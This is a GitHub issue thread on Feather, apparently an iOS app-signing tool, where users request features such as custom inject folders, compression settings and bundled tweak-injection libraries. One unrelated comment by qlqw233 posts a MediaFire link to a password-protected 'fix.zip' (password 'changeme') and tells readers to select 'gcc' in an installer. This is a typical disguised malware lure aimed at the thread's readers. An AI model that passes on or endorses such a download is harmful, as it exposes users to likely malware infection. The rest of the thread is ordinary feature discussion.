### ISSUE TITLE
add Feature

### ISSUE THREAD

**Issue by columbusux** [khcrysalis/Feather#17]
I think we need `(Remove mobileprovision after signing) + inject path + folder + Compress level setup`
Hmmm i think this all for now…
And thank you

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by khcrysalis** [comment]
whats folder?

**Comment by columbusux** [comment]
Plus pls add all to-do list in readme so that we do not repeat the ideas that already exist, just so that everything is clear for the incredible project.

**Comment by columbusux** [comment]
> whats folder?

Like the esign method and we can add more 
![IMG_7063](https://github.com/user-attachments/assets/34e14e5d-8939-4cc6-9b79-02aa005570be)

**Comment by khcrysalis** [comment]
One thing, is the custom inject folder *actually necessary?*

**Comment by columbusux** [comment]
> One thing, is the custom inject folder _actually necessary?_

Yes, sometimes some applications contain modification detection in the framework folder, so you must inject outside the framework folder.

**Comment by khcrysalis** [comment]
I see, thats good to know actually

**Comment by columbusux** [comment]
The dream feature is when we add injection options included in the Feather so that they are ready and this will outperform all the current signing apps and it is the addition of `( Libhooker.dylib + CydiaSubstrate.framework + libblackjack.dylib + libsubstrate.dylib )` and it is in the same project the user signs by choosing one of these options that suits him or it is in the repo of the Feather so that he downloads it but it would be great if this feature was completed
